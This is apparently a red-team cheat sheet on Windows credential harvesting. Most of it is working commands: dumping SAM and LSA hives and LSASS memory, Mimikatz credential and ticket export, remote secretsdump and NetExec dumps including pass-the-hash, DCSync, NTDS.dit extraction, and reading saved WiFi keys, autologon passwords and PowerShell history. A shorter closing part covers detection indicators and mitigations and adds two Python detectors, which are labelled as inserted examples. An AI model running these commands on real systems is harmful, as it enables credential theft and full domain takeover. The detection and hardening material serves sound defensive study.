Windows Credential Harvesting

Overview

Windows stores credentials in multiple locations — LSASS process memory, the SAM database, LSA secrets, NTDS.dit (on domain controllers), and cached domain credentials. Credential harvesting extracts these for offline cracking or pass-the-hash attacks. LSASS dumping and SAM extraction are the two most common techniques. On domain controllers, DCSync and NTDS.dit extraction give access to all domain hashes.

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1003.001 - OS Credential Dumping: LSASS Memory
  • Technique: T1003.002 - OS Credential Dumping: Security Account Manager
  • Technique: T1003.003 - OS Credential Dumping: NTDS
  • Technique: T1003.004 - OS Credential Dumping: LSA Secrets
  • Technique: T1003.006 - OS Credential Dumping: DCSync

Prerequisites

  • SYSTEM or Administrator access on the target (for most techniques)
  • Domain Admin or equivalent for DCSync and NTDS extraction
  • SeDebugPrivilege for LSASS access

Techniques

SAM Database Extraction

The SAM (Security Account Manager) stores local user password hashes:

:: Save SAM, SYSTEM, and SECURITY hives
reg save HKLM\SAM C:\Users\Public\sam.bak
reg save HKLM\SYSTEM C:\Users\Public\system.bak
reg save HKLM\SECURITY C:\Users\Public\security.bak

# Extract hashes offline
# Impacket
# https://github.com/fortra/impacket
impacket-secretsdump -sam sam.bak -system system.bak -security security.bak LOCAL

Output format: Username:RID:LMHash:NTHash:::

LSASS Memory Dump

LSASS (Local Security Authority Subsystem Service) holds plaintext passwords, NTLM hashes, and Kerberos tickets for logged-in users:

:: Task Manager method (requires GUI)
:: Task Manager > Details > lsass.exe > Create dump file
:: Output: C:\Users\<user>\AppData\Local\Temp\lsass.DMP

:: comsvcs.dll method (command line, requires SeDebugPrivilege)
:: Find LSASS PID
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Users\Public\lsass.dmp full

# Extract credentials from LSASS dump
# Impacket
# https://github.com/fortra/impacket
# pypykatz (Python implementation of mimikatz)
# https://github.com/skelsec/pypykatz
pypykatz lsa minidump lsass.dmp

Mimikatz

:: Mimikatz
:: https://github.com/gentilkiwi/mimikatz

:: Dump LSASS credentials (requires SeDebugPrivilege or SYSTEM)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

:: Dump SAM hashes
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

:: Dump LSA secrets
mimikatz.exe "privilege::debug" "lsadump::secrets" "exit"

:: Dump cached domain credentials (DCC2)
mimikatz.exe "privilege::debug" "lsadump::cache" "exit"

:: Export Kerberos tickets
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Remote Credential Extraction

# Impacket secretsdump — remote credential extraction
# https://github.com/fortra/impacket
# Uses SMB to extract SAM, LSA secrets, and cached credentials remotely
impacket-secretsdump '<domain>/<user>:<password>@<target>'

# With NTLM hash (pass-the-hash)
impacket-secretsdump '<domain>/<user>@<target>' -hashes ':<NThash>'

# DCSync a single user (target must be a Domain Controller)
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc-user Administrator

# Output to file
impacket-secretsdump '<domain>/<user>:<password>@<target>' -outputfile creds

# NetExec — remote SAM/LSA/NTDS dump
# https://github.com/Pennyw0rth/NetExec
nxc smb <target> -u <user> -p <password> --sam
nxc smb <target> -u <user> -p <password> --lsa
nxc smb <target> -u <user> -p <password> --ntds    # Domain controller only

DCSync Attack

DCSync simulates a domain controller replication request to extract password hashes. Requires Replicating Directory Changes and Replicating Directory Changes All permissions (Domain Admin by default):

# Impacket secretsdump — DCSync
# https://github.com/fortra/impacket
# All domain hashes
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc

# Specific user
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc-user Administrator

# NTLM hashes only (skip Kerberos keys)
impacket-secretsdump '<domain>/<user>:<password>@<DC_IP>' -just-dc-ntlm

:: Mimikatz DCSync
:: https://github.com/gentilkiwi/mimikatz
mimikatz.exe "lsadump::dcsync /domain:corp.local /user:Administrator" "exit"
mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" "exit"

NTDS.dit Extraction

NTDS.dit is the Active Directory database containing all domain hashes. It is locked while the DC is running:

:: Volume Shadow Copy method
vssadmin create shadow /for=C:
:: Copy from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Users\Public\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Users\Public\system.bak
vssadmin delete shadows /shadow={shadow_id} /quiet

:: ntdsutil method
ntdsutil "ac i ntds" "ifm" "create full C:\Users\Public\ntds_dump" quit quit

# Extract hashes from NTDS.dit offline
# Impacket
# https://github.com/fortra/impacket
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL

Credential Files

:: Saved credentials
cmdkey /list

:: WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear

:: Registry autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr /i "DefaultPassword"

:: PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

:: Unattended install files
type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\sysprep\sysprep.xml 2>nul

Detection Methods

Network-Based Detection

  • DCSync: DRSUAPI replication traffic from non-DC hosts
  • Remote secretsdump: SMB connections followed by remote registry and DRSUAPI operations
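The DRSUAPI bullet above and the Event ID 4662 indicator under host-based detection reduce to one check: directory replication rights requested by an account that is not a domain controller. The following is an added example (not code from the original page) that applies that check to constructed 4662 records; the DC account inventory and the flattened record format are assumptions.

```python
import re

# Well-known control-access-right GUIDs requested for directory replication
# (standard AD extended-right GUIDs, not page-specific values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Hypothetical inventory of domain controller computer accounts (assumption).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

def parse_event(record):
    """Parse a flattened 'Key=Value;Key=Value' record (constructed format)."""
    return {k.strip(): v.strip() for k, _, v in
            (part.partition("=") for part in record.split(";"))}

def dcsync_alerts(records):
    """Return (user, domain, [rights]) for 4662 events that request replication
    rights from an account that is not a known domain controller."""
    alerts = []
    for raw in records:
        ev = parse_event(raw)
        if ev.get("EventID") != "4662":
            continue
        # The Properties field carries the requested access-right GUIDs.
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
        if not rights:
            continue  # ordinary object access, not replication
        user = ev.get("SubjectUserName", "")
        if user in KNOWN_DC_ACCOUNTS:
            continue  # DC-to-DC replication is expected traffic
        alerts.append((user, ev.get("SubjectDomainName", ""), rights))
    return alerts

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    "EventID=4662;SubjectUserName=DC02$;SubjectDomainName=CORP;Properties=Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jsmith;SubjectDomainName=CORP;Properties=Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jsmith;SubjectDomainName=CORP;Properties=Read Property {bf967a86-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624;SubjectUserName=jsmith;SubjectDomainName=CORP",
]

if __name__ == "__main__":
    for user, domain, rights in dcsync_alerts(SAMPLE_EVENTS):
        print(f"DCSync indicator: {domain}\\{user} requested {', '.join(rights)}")
```

Accounts that legitimately hold replication rights (Azure AD Connect, some backup agents) belong in the allowlist alongside the DC accounts, otherwise they will alert on every sync.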

Host-Based Detection

  • LSASS access events (Sysmon Event ID 10 with TargetImage lsass.exe)
  • Registry hive saves (reg save HKLM\SAM)
  • Volume Shadow Copy creation on domain controllers
  • Mimikatz signatures (process name, module loads, specific API calls)
  • Event ID 4662 with Replicating Directory Changes (DCSync indicator)
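The Sysmon Event ID 10 indicator above is most useful when the GrantedAccess mask is decoded rather than matched against a fixed list: a minidump needs PROCESS_VM_READ on lsass, and injection needs write, thread or handle rights. The following is an added example (not code from the original page) that triages constructed Event ID 10 records this way; the process allowlist and the flattened record format are assumptions.

```python
PROCESS_VM_READ, PROCESS_VM_WRITE = 0x0010, 0x0020  # VM_READ is what MiniDumpWriteDump needs
PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE = 0x0002, 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF
INJECTION_RIGHTS = PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE

# Hypothetical allowlist (assumption): processes that open lsass legitimately.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}
DUMP_MODULES = ("dbghelp.dll", "dbgcore.dll")  # both export MiniDumpWriteDump

def parse_event(record):
    """Parse a flattened 'Key=Value;Key=Value' Sysmon record (constructed format)."""
    return {k.strip(): v.strip() for k, _, v in
            (part.partition("=") for part in record.split(";"))}

def classify_lsass_access(record):
    """Return the reasons an Event ID 10 record is suspicious; empty means benign."""
    ev = parse_event(record)
    if ev.get("EventID") != "10" or not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return []
    if ev.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return []
    access = int(ev.get("GrantedAccess", "0"), 16)
    reasons = []
    if access == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS handle to lsass")
    else:
        if access & PROCESS_VM_READ:
            reasons.append(f"memory read access (GrantedAccess=0x{access:x})")
        if access & INJECTION_RIGHTS:
            reasons.append("write/thread/handle rights (possible injection)")
    if any(m in ev.get("CallTrace", "").lower() for m in DUMP_MODULES):
        reasons.append("minidump library in call stack")
    return reasons

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    r"EventID=10;SourceImage=C:\Windows\System32\rundll32.exe;TargetImage=C:\Windows\system32\lsass.exe;GrantedAccess=0x1FFFFF;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d0f4|C:\Windows\System32\dbgcore.dll+2a1b0|C:\Windows\System32\comsvcs.dll+3e4f2",
    r"EventID=10;SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe;TargetImage=C:\Windows\system32\lsass.exe;GrantedAccess=0x1FFFFF;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d0f4",
    r"EventID=10;SourceImage=C:\Users\Public\tool.exe;TargetImage=C:\Windows\system32\lsass.exe;GrantedAccess=0x1010;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d0f4|C:\Windows\System32\KERNELBASE.dll+2e0b8",
    r"EventID=10;SourceImage=C:\Windows\System32\svchost.exe;TargetImage=C:\Windows\system32\lsass.exe;GrantedAccess=0x1400;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d0f4",
]

if __name__ == "__main__":
    for rec in SAMPLE_EVENTS:
        print(parse_event(rec)["SourceImage"], "->", classify_lsass_access(rec) or "benign")
```

The fourth record (0x1400, query rights only) shows why the mask matters: a non-allowlisted process that merely queries lsass is not a dump, while 0x1010 from an unknown binary in a user-writable path is.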

Mitigation Strategies

  • Enable Credential Guard — protects LSASS from memory dumps on Windows 10/Server 2016+
  • Disable WDigest — prevents plaintext password storage in LSASS memory
  • Protected Users group — prevents NTLM hash storage, forces Kerberos
  • LSASS protection — enable RunAsPPL (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1)
  • Limit Domain Admin usage — avoid logging into workstations with DA credentials
  • Monitor DCSync attempts — alert on replication requests from non-DC machines
